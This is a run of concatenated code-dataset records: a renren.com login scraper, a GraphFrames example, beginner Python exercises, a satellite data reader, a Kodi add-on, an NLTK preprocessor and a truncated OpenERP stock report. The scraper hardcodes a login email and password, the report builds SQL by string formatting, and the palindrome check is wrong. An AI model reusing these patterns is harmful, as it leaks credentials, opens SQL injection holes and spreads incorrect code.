\"mr_mao_hacker@163.com\", \"password\" : \"alarmchime\"}\n # 转换为url编码字符\n data = urllib.urlencode(form_data)\n\n headers = {\"User-Agent\" : \"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\"}\n\n request = urllib2.Request(login_url, data, headers)\n\n # 发送登录的post请求,登录成功则自动保存Cookie\n opener.open(request)\n\n # 1. 返回opener对象,传递给其他函数使用\n #return opener\n # 2. 通过install_opener将自定义opener加载为全局权限,这样在代码的任何地方使用urlopen() 都具有opener的功能\n urllib2.install_opener(opener)\n\n\ndef main():\n \"\"\"\n 通过opener对象处理并传递Cookie,获取需要登录权限的页面数据\n \"\"\"\n # 如果是login()是return的话则接收opener对象\n #opener = login()\n login()\n\n url_list = [\n \"http://www.renren.com/327550029/profile\",\n \"http://www.renren.com/410043129/profile\"\n ]\n\n headers = {\"User-Agent\" : \"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\"}\n for index, url in enumerate(url_list):\n request = urllib2.Request(url, headers = headers)\n # 发送其他页面的get请求(附带了登录状态的Cookie)\n #response = opener.open(request)\n response = urllib2.urlopen(request)\n\n with open(str(index) + \"_renren.html\", \"w\") as f:\n f.write(response.read())\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"day01_03/day03/handler_opener/cookielib_renren_login.py","file_name":"cookielib_renren_login.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"173841110","text":"# add GraphFrames package to spark-submit\nimport os\nos.environ['PYSPARK_SUBMIT_ARGS'] = '--packages graphframes:graphframes:0.7.0-spark2.4-s_2.11'\nimport sys\nfrom functools import reduce\nfrom pyspark.sql.functions import col, lit, when\nimport pyspark\nfrom graphframes.examples import Graphs\nfrom graphframes import GraphFrame\nimport config\n\nsc = pyspark.SparkContext()\nsqlContext = pyspark.SQLContext(sc)\ninputFile = sys.argv[1]\n# g = Graphs(sqlContext).friends() # Get example graph\ndf = sqlContext.read.format(\"csv\").option(\"delimiter\", config.delimiter).load(inputFile)\n# Rename columns to something decent.\ndf = df.withColumnRenamed(\"_c0\", \"src\")\\\n.withColumnRenamed(\"_c1\", \"dst\")\\\n.withColumnRenamed(\"_c2\", \"weight\")\ndf.show(5)\n\naggcodes = df.select(\"src\",\"dst\").rdd.flatMap(lambda x: x).distinct()\nvertices = aggcodes.map(lambda x: (x, x)).toDF([\"id\",\"name\"])\n\nedges = df.select(\"src\", \"dst\")\ng = GraphFrame(vertices, edges)\n\n# Display the vertex and edge DataFrames\ng.vertices.show(5)\n# +--+-------+---+\n# |id| name|age|\n# +--+-------+---+\n# | a| Alice| 34|\n# | b| Bob| 36|\n# | c|Charlie| 30|\n# | d| David| 29|\n# | e| Esther| 32|\n# | f| Fanny| 36|\n# | g| Gabby| 60|\n# +--+-------+---+\n\ng.edges.show(5)\n# +---+---+------------+\n# |src|dst|relationship|\n# +---+---+------------+\n# | a| b| friend|\n# | b| c| follow|\n# | c| b| follow|\n# | f| c| follow|\n# | e| f| follow|\n# | e| d| friend|\n# | d| a| friend|\n# | a| e| friend|\n# +---+---+------------+\n\n# Get a DataFrame with columns \"id\" and \"inDegree\" (in-degree)\nvertexInDegrees = g.inDegrees\nvertexInDegrees.show(5)\n\n\n# Run LPA\ncommunities = g.labelPropagation(maxIter=5)\ncommunities.persist().show(10)\n","sub_path":"graphframes-examples/label-propagation.py","file_name":"label-propagation.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"372096700","text":"def palin(str1):\n a=len(str1)//2\n for i in range(0,a):\n for j in range(-1,a):\n \n if str1[i]==str1[j]:\n return(\"Palindrome\")\n else:\n return(\"Not Palindrome\")\n\n#Matrix Multiplication\ndef matrix_mul(m1,m2):\n m3=[[0,0],\n [0,0]]\n for i in range(len(m1)):\n for j in range(len(m2)):\n for k in range(len(m3)):\n m3[i][j]+=m1[i][k]*m2[k][j]\n return m3\n \n\n#Matrix Addition\ndef matrix_add(m1,m2):\n m4=[[0,0],\n [0,0]]\n for i in range(len(m1)):\n for j in range(len(m2)):\n m4[i][j]=m1[i][j]+m2[i][j]\n return m4\n\n#display letters after last vowel of the string\ndef stringee(str10):\n lt=[]\n for i in range(0,len(str10)):\n if str10[i] in \"aeiou\":\n lt.append(i)\n j=max(lt)+1\n str12=str10[j:]\n return(str12)\n","sub_path":"Python/4-4.30/day2defs.py","file_name":"day2defs.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"199326056","text":"# %%\nimport numpy as np\nfrom collections import OrderedDict as odict\nimport struct\nimport os\nimport gzip\nfrom datetime import datetime, timedelta\n\nclass level2(object):\n \"\"\"\n Read GSMaP level 2 data\n \"\"\"\n\n def __init__(self):\n self.npix = 221 # fixed. GMI\n\n dictvars = odict((\n ('pad1', '4x'),\n ('lon', 'f'), #\n ('lat', 'f'), #\n ('dtime', 'i'), #\n ('sfctype', 'f'), # sitoil\n ('irflg', 'f'), #\n ('sfcprcp', 'f'), # srainfg mm/h\n ('snowprb', 'f'), # \n ('pad2', '4x'),\n ))\n\n\n# dictvars = odict((\n# ('pad1', '4x'),\n# ('lon', 'f'), #\n# ('lat', 'f'), #\n# ('dtime', 'i'), #\n# ('itoil', 'f'), #\n# ('irflg', 'f'), #\n# ('rainfg', 'f'), #\n# ('snowprb', 'f'), #\n# ('pad2', '4x'),\n# ))\n\n self.vars, self.fmts = list(zip(*list(dictvars.items())))\n self.dictvars = dictvars.copy()\n self.fmtsize = struct.calcsize( '<'+ ''.join(self.fmts)) # bytes\n\n def get_var(self, srcPath=None, lvname=[], nrec=None, origin=0, compressed=True):\n fmts = self.fmts\n fmtsize = self.fmtsize\n vars = self.vars\n npix = self.npix\n\n\n if compressed is True:\n with gzip.open(srcPath, 'rb') as f:\n shead = f.read(12)\n ncount = struct.unpack_from('')\ndef playvideo(vid):\n v_url = video_from_vid(vid)\n url = 'stack://' + ' , '.join(v_url)\n plugin.set_resolved_url(url)\n\n\n@plugin.route('/setfilters')\ndef setfilters():\n# a=ML\n AREA_LIST = {'全部': '0', '内地':'ML', '港台':'HT', '欧美':'US',\n '韩国': 'KR', '日本':'JP', '二次元':'ACG','其他': 'Other'}\n# p=Boy\n PERSONS = {'全部': '0', '男艺人': 'Boy', '女艺人': 'Girl',\n '乐队组合': 'Combo', '其他': 'Other'}\n\n# c=hd, shd..., 画质\n dialog = xbmcgui.Dialog()\n\n title = u'艺人地区'\n keyword = AREA_LIST.keys()\n sel = dialog.select(title, keyword)\n area = '0' if sel < 0 else AREA_LIST[keyword[sel]]\n\n title = u'艺人类别'\n keyword = PERSONS.keys()\n sel = dialog.select(title, keyword)\n person = '0' if sel < 0 else PERSONS[keyword[sel]]\n return videolist(sid=0, tid=0, page=1, area=area, person=person)\n\n\n@plugin.route('/videolist/////')\ndef videolist(sid, tid, page, area, person):\n plugin.set_content('videos')\n res = int(__addon__.getSetting('video_resolution'))\n reslist = ('hd', 'shd', 'sh')\n\n page = int(page)\n req = {\n 'sid': sid,\n 'tid': tid,\n 'a': '' if area == '0' else area,\n 'p': '' if person == '0' else person,\n 'c': reslist[res],\n 's': '',\n 'pageSize': 20,\n 'page': page\n }\n \n data = urlencode(req)\n mvapi = 'http://mvapi.yinyuetai.com/mvchannel/so?'\n html = get_html(mvapi + data)\n results = loads(html)\n totalpage = int(results['pageInfo']['pageCount'])\n results = results['result']\n\n items = []\n if page > 1:\n items.append({\n 'label': u'上一页 ({}/{})'.format(page-1, totalpage),\n 'path': url_for('videolist',\n sid=sid,\n tid=tid,\n page=page-1,\n area=area,\n person=person)\n })\n\n for item in results:\n d = item.get('duration', '0:0:0')\n duration = 0\n for t in d.split(':'):\n duration = duration*60 + int(t)\n\n items.append({\n 'label': item['title'],\n 'path': url_for('playvideo', vid=item['videoId']),\n 'thumbnail': item['image'],\n 'is_playable': True,\n 'info': {'title': item['title'],\n 'plot': item['description'],\n 'duration': duration}\n })\n if page < totalpage:\n items.append({\n 'label': u'下一页 ({}/{})'.format(page+1, totalpage),\n 'path': url_for('videolist',\n sid=sid,\n tid=tid,\n page=page+1,\n area=area,\n person=person)\n })\n\n return items\n\n\n@plugin.route('/mainlist/////')\ndef mainlist(sid, tid, page, area, person):\n catapi = 'http://mvapi.yinyuetai.com/cata/get-cata?cataId=%s'\n items = [{\n 'label': u'[选择地区/类别]',\n 'path': url_for('setfilters')\n }]\n\n html = get_html(catapi % sid)\n catas = loads(html)['catas']\n catas.insert(0, {'cataName': u'全部', 'cataId': -1})\n for item in catas:\n tid = item['cataId']\n tid = tid if int(tid) > 0 else 0\n items.append({\n 'label': item['cataName'],\n 'path': url_for('videolist', sid=sid, tid=tid, page=page, area=area, person=person)\n })\n return items\n\n\n@plugin.route('/')\ndef root():\n items = [\n ('全部', '0'),\n ('音乐视频', '3'),\n ('现场/live','4'),\n ('娱乐视频', '9'),\n ('舞蹈', '5'),\n ('演奏', '6'),\n ('ACG', '7'),\n ('戏剧', '8')]\n\n for (name, sid) in items:\n path = 'videolist' if sid == '0' else 'mainlist'\n yield {\n 'label': name,\n 'path': url_for(path,\n sid=sid,\n tid='0',\n page=1,\n area='0',\n person='0')\n }\n\n\nif __name__ == '__main__':\n plugin.run()\n","sub_path":"plugin.video.yinyuetai/addon.py","file_name":"addon.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"309934780","text":"import json\n# Correct some text errors\nimport re\n#Replacing Words (Ex can't => cannot)\nfrom replacers import RegexpReplacer\n#Filter stopwords and punctuation\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\n# Training the POS \nfrom nltk.tag import UnigramTagger\nfrom nltk.corpus import treebank\n# Run Lemmatisation\nfrom nltk.stem import WordNetLemmatizer\n\n\ndef checkTopics(doc):\n topics = ['earn','acquisitions','money-fx','grain','crude','trade','interest','ship','wheat','corn']\n for x in doc['topics']:\n if x in topics:\n return True\n return False\ndef GetTopics(doc):\n topics = ['earn','acquisitions','money-fx','grain','crude','trade','interest','ship','wheat','corn']\n for x in doc['topics']:\n if x in topics:\n return x\ndef LoadJson(path):\n tmp_str =\"\"\n with open(path,'r') as f:\n tmp_str = f.read()\n tmp_json = json.loads(tmp_str)\n return tmp_json\ndef LoadProcess(path):\n j_temp = LoadJson(path)\n j_temp = [x for x in j_temp if checkTopics(x)]\n tmp_bodies = [x['body'].replace('\\n','').replace('Reuter','') for x in j_temp]\n Y = [GetTopics(x) for x in j_temp]\n return ProcessData(tmp_bodies), Y\ndef ProcessData(bodies,strFormat = True):\n replacer = RegexpReplacer()\n r = re.compile(r\"^\\w+\\.$\")\n train_sents = treebank.tagged_sents()\n # Training the POS\n tagger = UnigramTagger(train_sents)\n lemmatizer = WordNetLemmatizer()\n bodies_words = []\n for i,body in enumerate(bodies):\n #print 'Body # {}'.format(i)\n #Replacing words (can't etc..)\n tmp_bodies = replacer.replace(body)\n #Filtering stopwords and punctuation\n english_stops = set(stopwords.words('english'))\n toRemove = [',',';','.','the']\n words = [x for x in word_tokenize(tmp_bodies) if ((x not in english_stops) & (x.encode('utf-8').lower() not in toRemove))]\n #Basic text correction\n words = [x.replace('.','') if(re.match(r,x) is not None) else x for x in words]\n # Running the POS\n words_POS = [ x for x in tagger.tag(words) if ((x[1] is not None) & (x[1] is not 'CC'))]#CC => &\n words_POS = [ ('CD',x[1]) if x[1] == 'CD' else x for x in words_POS]\n #Lem of the verbs\n words_POS_LEM = [(lemmatizer.lemmatize(x[0], pos='v'),x[1]) if ('VB' in x[1]) else x for x in words_POS ]\n bodies_words.append([x[0] for x in words_POS_LEM ])\n\n if strFormat is True:\n return [' '.join(x) for x in bodies_words]\n else:\n return bodies_words\n\n\n\n\n\n\n\n\n\n\n","sub_path":"DataMiningExo_Python/Preprocess.py","file_name":"Preprocess.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"467466769","text":"from mx import DateTime\nfrom report import report_sxw\nfrom osv import osv\nimport pooler\nimport time\nfrom tools.translate import _\n\n\nclass report_stock_management(report_sxw.rml_parse):\n \n def set_context(self, objects, data, ids, report_type=None):\n new_ids = ids\n obj_move = self.pool.get('account.move.line')\n obj_period = self.pool.get('account.period')\n period_ids = obj_period.search(self.cr, self.uid, [('date_start','<=',data['form']['date']),('date_stop','>=',data['form']['date'])])\n #print \"period_ids===\",period_ids\n fiscalyear = False\n if period_ids:\n period_id = obj_period.browse(self.cr, self.uid, period_ids[0])\n fiscalyear = period_id.fiscalyear_id and period_id.fiscalyear_id.id or False\n #self.sortby = data['form'].get('sortby', 'sort_date')\n self.query = obj_move._query_get(self.cr, self.uid, obj='l', context=data['form'].get('used_context',{}))\n self.query_in_out = obj_move._query_get(self.cr, self.uid, obj='ll', context=data['form'].get('used_context',{}))\n #print \"data['form'].get('used_context',{})\",data,data['form'].get('used_context',{})\n ctx2 = data['form'].get('used_context',{}).copy()\n ctx2.update({'initial_bal': True, 'fiscalyear': fiscalyear})\n #print \"ctx2\",ctx2\n self.init_query = obj_move._query_get(self.cr, self.uid, obj='l', context=ctx2)\n self.init_in_query = obj_move._query_get(self.cr, self.uid, obj='ll', context=ctx2)\n #print \"=+++++++++\",self.query\n #print \">>>>>>>>>>\",self.init_query\n return super(report_stock_management, self).set_context(objects, data, new_ids, report_type=report_type)\n \n def __init__(self, cr, uid, name, context):\n \n super(report_stock_management, self).__init__(cr, uid, name, context=context)\n self.localcontext.update({\n 'get_product':self._get_product,\n 'get_stock':self._get_stock,\n })\n obj_move = self.pool.get('account.move.line')\n #self.init_query = 'obj_move._query_get(self.cr, self.uid, obj='l', context=ctx2)'\n self.query = \"\"\n self.init_balance = True\n self.context = context\n self.qcache = {}\n self.ilcache = {} # init line cache\n \n \n def _get_product(self, data):\n #print \"data\",data\n product = self.pool.get('product.product').search(self.cr, self.uid, data)\n return product\n \n def _get_stock(self, data, product):\n #print \"product\",product\n query=\"SELECT al.product_id as product_id, al.product_uom as product_uom, COALESCE(al.awal_out_qty,0) as product_qty_out_awal, COALESCE(al.awal_in_qty,0) as product_qty_in_awal, COALESCE(al.out_qty,0) as product_qty_out, COALESCE(al.in_qty,0) as product_qty_in \\\n FROM (select A.product_id as product_id, A.product_uom as product_uom, \\\n (select sum(a.product_qty) \\\n from stock_move a, stock_location b \\\n where a.state IN ('done') and a.product_id = \"+ str(product) +\" \\\n and a.location_id=b.id \\\n and a.date < '\"+ data['date'] +\"' \\\n and b.usage = 'internal') as awal_out_qty, \\\n (select sum(a.product_qty) \\\n from stock_move a, stock_location b \\\n where a.state IN ('done') and a.product_id = \"+ str(product) +\" \\\n and a.location_dest_id=b.id \\\n and a.date < '\"+ data['date'] +\"' \\\n and b.usage = 'internal') as awal_in_qty, \\\n (select sum(a.product_qty) \\\n from stock_move a, stock_location b \\\n where a.state IN ('done') and a.product_id = \"+ str(product) +\" \\\n and a.location_id=b.id \\\n and a.date between '\"+ data['date'] +\"' and '\"+ data['date_end'] +\"' \\\n and b.usage = 'internal') as out_qty, \\\n (select sum(a.product_qty) \\\n from stock_move a, stock_location b \\\n where a.state IN ('done') and a.product_id = \"+ str(product) +\" \\\n and a.location_dest_id=b.id \\\n and a.date between '\"+ data['date'] +\"' and '\"+ data['date_end'] +\"' \\\n and b.usage = 'internal') as in_qty \\\n from stock_move A, stock_location B \\\n where A.state IN ('done') and A.product_id = \"+ str(product) +\" \\\n and B.usage = 'internal' \\\n group by a.product_id, a.product_uom) AS al \\\n group by al.product_id,al.product_uom, al.awal_out_qty, al.awal_in_qty, al.out_qty, al.in_qty\"\n self.cr.execute(query)\n res_lines = self.cr.dictfetchall() \n res = res_lines\n for l in res:\n product = self.pool.get('product.product').browse(self.cr, self.uid, l['product_id'])\n l['product_id'] = product or ''\n l['product_uom'] = product.uom_id or ''\n l['product_awal'] = (l['product_qty_in_awal']) or 0 - (l['product_qty_out_awal']) or 0 or 0\n l['product_qty_out'] = l['product_qty_out'] or 0\n l['product_qty_in'] = l['product_qty_in'] or 0\n l['product_akhir'] = l['product_awal'] - l['product_qty_out'] + l['product_qty_in'] or 0\n return res\n \n def get_children_accounts(self, data, product, account):\n #print \"get_children_accounts\",data\n account = account[0]\n product_obj = self.pool.get('product.product')\n product_id = product_obj.browse(self.cr, self.uid, product)\n# ids_acc = self.pool.get('account.account')._get_children_and_consol(self.cr, self.uid, account)\n# tuple_ids_acc = tuple(ids_acc)\n# for child_account in ids_acc:\n# self.qcache.setdefault(child_account, {'num_entry': 0,\n# 'debit': 0.0, 'credit': 0.0, 'balance': 0.0, 'currency': 0.0, 'num_entry': 0,\n# 'init_debit': 0.0, 'init_credit': 0.0, 'init_balance': 0.0, 'init_currency': 0.0 })\n# q = \"\"\"\n# SELECT l.account_id,\n# count(l.id) AS num_entry,\n# COALESCE(SUM(l.debit),0.0) AS debit,\n# COALESCE(SUM(l.credit),0.0) AS credit,\n# COALESCE(SUM(l.debit),0.0) - COALESCE(SUM(l.credit),0.0) AS balance,\n# COALESCE(SUM(l.amount_currency),0.0) AS currency\n# FROM account_move_line AS l\n# WHERE %s AND\n# l.account_id IN %%s\n# GROUP BY l.account_id\n# \"\"\" % (self.query)\n# self.cr.execute(q, (tuple_ids_acc,))\n# for a in self.cr.dictfetchall():\n# aid = a.pop('account_id')\n# self.qcache[aid].update(a)\n\n if self.init_balance:\n move_state = ['posted','']\n #print \"xxxxxxxxxxxxxxxxxxxx\",self.query,account\n #print \"xxxxxxxxxxxxxxxxxxxx\",self.init_in_query,account\n # Compute account initial debit / credit / balance\n q = \"\"\"\n SELECT 0 AS lid, '' AS ldate, '' AS lcode, COALESCE(SUM(l.amount_currency),0.0) AS amount_currency, 'Saldo Awal' AS lref, 'Saldo Awal' AS lname, \n COALESCE(SUM(l.debit),0.0) AS debit, \n COALESCE(SUM(l.credit),0.0) AS credit, \n (SELECT COALESCE(sum(ll.quantity),0) FROM account_move_line ll WHERE ll.debit >= 0 and ll.credit = 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_in, \n (SELECT COALESCE(sum(ll.debit),0) FROM account_move_line ll WHERE ll.debit >= 0 and ll.credit = 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_debit,\n (SELECT COALESCE(sum(ll.quantity),0) FROM account_move_line ll WHERE ll.credit >= 0 and ll.debit = 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_out,\n (SELECT COALESCE(sum(ll.credit),0) FROM account_move_line ll WHERE ll.credit >= 0 and ll.debit = 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_credit, \n \n (SELECT COALESCE(sum(ll.quantity),0) FROM account_move_line ll WHERE ll.debit >= 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_in1, \n (SELECT COALESCE(sum(ll.debit),0) FROM account_move_line ll WHERE ll.debit >= 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_debit1,\n (SELECT COALESCE(sum(ll.quantity),0) FROM account_move_line ll WHERE ll.credit >= 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_out1,\n (SELECT COALESCE(sum(ll.credit),0) FROM account_move_line ll WHERE ll.credit >= 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_credit1,\n \n (SELECT COALESCE(sum(ll.quantity),0) FROM account_move_line ll WHERE ll.debit > 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date between '%s' and '%s') AND ll.product_id = %s) AS lqty_in_in, \n (SELECT COALESCE(sum(ll.quantity),0) FROM account_move_line ll WHERE ll.credit > 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date between '%s' and '%s') AND ll.product_id = %s) AS lqty_out_out,\n (SELECT COALESCE(sum(ll.debit),0) FROM account_move_line ll WHERE ll.debit > 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date between '%s' and '%s') AND ll.product_id = %s) AS debit_in, \n (SELECT COALESCE(sum(ll.credit),0) FROM account_move_line ll WHERE ll.credit > 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date between '%s' and '%s') AND ll.product_id = %s) AS credit_out, \n '' AS lperiod_id, '' AS lpartner_id,\n '' AS move_name, '' AS mmove_id, '' AS period_code, '' AS aaname, '' AS aname, '' AS acode,\n '' AS currency_code,\n NULL AS currency_id,\n '' AS invoice_id, '' AS invoice_type, '' AS invoice_number,\n '' AS partner_name, '' AS pproduct, '' AS lqty\n FROM account_move_line l\n LEFT JOIN account_move m on (l.move_id=m.id)\n LEFT JOIN product_product prd on (l.product_id=prd.id)\n LEFT JOIN res_currency c on (l.currency_id=c.id)\n LEFT JOIN res_partner p on (l.partner_id=p.id)\n LEFT JOIN account_invoice i on (m.id =i.move_id)\n JOIN account_journal j on (l.journal_id=j.id) AND j.code != 'OBJ' \n WHERE %s AND l.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND l.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND l.product_id = %s\n \"\"\" % (self.query_in_out, data['date'], product,\n self.query_in_out, data['date'], product, \n self.query_in_out, data['date'], product, \n self.query_in_out, data['date'], product, \n self.query_in_out, data['date'], product,\n self.query_in_out, data['date'], product, \n self.query_in_out, data['date'], product, \n self.query_in_out, data['date'], product, \n self.init_in_query, data['date'], data['date_end'], product, \n self.init_in_query, data['date'], data['date_end'], product, \n self.init_in_query, data['date'], data['date_end'], product, \n self.init_in_query, data['date'], data['date_end'], product, \n self.init_query, data['date'], product)\n self.cr.execute(q)\n #print q\n res = self.cr.dictfetchall()\n #print \"resss========\",self.init_in_query\n for l in res:\n l['pproduct'] = product_id.name_template\n l['product_awal'] = (l['lqty_debit'] - l['lqty_credit']) > 0.0 and l['lqty_in'] or -l['lqty_out'] or l['lqty_in1']-l['lqty_out1'] #(l['debit'] > 0 and l['lqty_in']) - (l['credit'] > 0 and l['lqty_out'])#l['lqty_in']-l['lqty_out']#\n l['product_masuk'] = ''#l['lqty_in_in'] or 0\n l['product_keluar'] = ''#l['lqty_out_out'] or 0\n l['product_akhir'] = ''#product_id.qty_available or 0.0#l['product_awal'] + l['product_masuk'] - l['product_keluar'] or 0\n l['saldo_awal'] = (l['lqty_debit'] - l['lqty_credit']) or (l['lqty_debit1'] - l['lqty_credit1'])#l['debit'] - l['credit'] or 0\n l['saldo_masuk'] = ''#l['debit_in'] or 0#l['debit']# l['debit_in']\n l['saldo_keluar'] = ''#l['credit_out'] or 0#l['credit']# l['credit_out']\n #print \"=============\",l['debit'],l['lqty_in'],l['credit'],l['lqty_out'],l['product_awal'],l['product_masuk'],l['product_keluar']\n l['saldo_akhir'] = ''#l['saldo_awal'] + l['saldo_masuk'] - l['saldo_keluar']\n return res\n \n def lines(self, data, product, account):\n \"\"\" Return all the account_move_line of account with their account code counterparts \"\"\"\n# if self.qcache[account.id]['num_entry'] == 0:\n# # XXX: No lines, we already known that\n# # XXX: Do we need to diplay the 'Intial Balance' line?\n# return []\n #move_state = ['posted', '']\n # First compute all counterpart strings for every move_id where this account appear.\n # Currently, the counterpart info is used only in landscape mode\n# sql = \"\"\"\n# SELECT m1.move_id,\n# array_to_string(ARRAY(SELECT DISTINCT a.code\n# FROM account_move_line m2\n# LEFT JOIN account_account a ON (m2.account_id=a.id)\n# WHERE m2.move_id = m1.move_id\n# AND m2.account_id<>%%s), ', ') AS counterpart\n# FROM (SELECT move_id\n# FROM account_move_line l\n# LEFT JOIN account_move am ON (am.id = l.move_id)\n# WHERE %s AND l.account_id in %%s GROUP BY move_id) m1\n# \"\"\"% (self.query)\n# self.cr.execute(sql, (account, account))\n# counterpart_res = self.cr.dictfetchall()\n# counterpart_accounts = {}\n# for i in counterpart_res:\n# counterpart_accounts[i['move_id']] = i['counterpart']\n# del counterpart_res\n\n # Then select all account_move_line of this account\n sql_sort='l.date, l.move_id'\n sql = \"\"\"\n SELECT l.id AS lid,\n l.date AS ldate,\n j.code AS lcode,\n l.currency_id,\n l.amount_currency,\n l.ref AS lref,\n l.name AS lname,\n aa.name AS aaname,\n COALESCE(l.debit,0) AS debit,\n COALESCE(l.credit,0) AS credit,\n COALESCE(l.quantity,0) AS lqty_in,\n COALESCE(l.quantity,0) AS lqty_out,\n l.period_id AS lperiod_id,\n l.partner_id AS lpartner_id,\n m.name AS move_name,\n m.id AS mmove_id,\n per.code as period_code,\n c.symbol AS currency_code,\n i.id AS invoice_id,\n i.type AS invoice_type,\n i.number AS invoice_number,\n p.name AS partner_name,\n a.name AS aname,\n a.code AS acode, prd.name_template AS pproduct, prd.id AS prodid\n FROM account_move_line l\n JOIN account_move m on (l.move_id=m.id)\n LEFT JOIN product_product prd on (l.product_id=prd.id)\n LEFT JOIN account_analytic_account aa on (l.analytic_account_id=aa.id)\n LEFT JOIN account_account a on (l.account_id=a.id)\n LEFT JOIN res_currency c on (l.currency_id=c.id)\n LEFT JOIN res_partner p on (l.partner_id=p.id)\n LEFT JOIN account_invoice i on (m.id =i.move_id)\n LEFT JOIN account_period per on (per.id=l.period_id)\n JOIN account_journal j on (l.journal_id=j.id) \n WHERE %s AND l.product_id = %s AND l.date between '%s' and '%s' AND l.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) ORDER by %s\n \"\"\" %(self.query, product, data['date'], data['date_end'], sql_sort)\n self.cr.execute(sql)\n res_lines = self.cr.dictfetchall()\n res_init = []\n #print \"sql\",sql\n# if self.init_balance:\n# sql = \"\"\"\n# SELECT 0 AS lid, '' AS ldate, '' AS lcode, COALESCE(SUM(l.amount_currency),0.0) AS amount_currency, 'Saldo Awal' AS lref, 'Saldo Awal' AS lname, \n# COALESCE(SUM(l.debit),0.0) AS debit, COALESCE(SUM(l.credit),0.0) AS credit, '' AS lperiod_id, '' AS lpartner_id,\n# '' AS move_name, '' AS mmove_id, '' AS period_code, '' AS aaname, '' AS aname, '' AS acode,\n# '' AS currency_code,\n# NULL AS currency_id,\n# '' AS invoice_id, '' AS invoice_type, '' AS invoice_number,\n# '' AS partner_name, '' AS pproduct,\n# (SELECT COALESCE(sum(ll.quantity)) FROM account_move_line ll WHERE %s AND ll.debit > 0 AND ll.credit = 0 AND ll.account_id = %%s AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_in, \n# (SELECT COALESCE(sum(ll.quantity)) FROM account_move_line ll WHERE %s AND ll.credit > 0 AND ll.debit = 0 AND ll.account_id = %%s AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_out \n# FROM account_move_line l\n# LEFT JOIN account_move m on (l.move_id=m.id)\n# LEFT JOIN product_product prd on (l.product_id=prd.id)\n# LEFT JOIN res_currency c on (l.currency_id=c.id)\n# LEFT JOIN res_partner p on (l.partner_id=p.id)\n# LEFT JOIN account_invoice i on (m.id =i.move_id)\n# JOIN account_journal j on (l.journal_id=j.id) AND j.code != 'OBJ' \n# WHERE %s AND l.account_id = %%s AND l.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND l.product_id = %s\n# \"\"\" %(self.init_in_query, data['date'], product, self.init_out_query, data['date'], product, self.init_query, data['date'], product)\n# self.cr.execute(sql, (account.id,account.id,account.id))\n# res_init = self.cr.dictfetchall() \n if res_init:\n res = res_init + res_lines\n else:\n res = res_lines\n account_sum = saldo_sum = 0.0\n #awal = account['lqty_in']\n for l in res:\n #print '=====>>>>======',l['pproduct'] \n# move_line_obj = self.pool.get('account.move.line')\n stock_picking_obj = self.pool.get('stock.picking')\n stock_move_obj = self.pool.get('stock.move')\n product_obj = self.pool.get('product.product')\n product_standard_obj = self.pool.get('product.standard.price')\n# move_line_ids = move_line_obj.search(self.cr, self.uid, [('move_id','=',l['mmove_id']),('account_id','!=',account)])\n# line_move_ids = []\n# for line_move in move_line_obj.browse(self.cr, self.uid, move_line_ids):\n# #l['lorigin'] = line_move.invoice and line_move.invoice.origin or ''\n# line_move_ids.append(line_move.account_id.name)\n \n l['lorigin'] = ''\n l['llocation'] = ''\n picking_ids = stock_picking_obj.search(self.cr, self.uid, [('name','=',l['lref'])])\n move_ids = stock_move_obj.search(self.cr, self.uid, [('name','=',l['lname'])])\n if picking_ids:\n for pick in 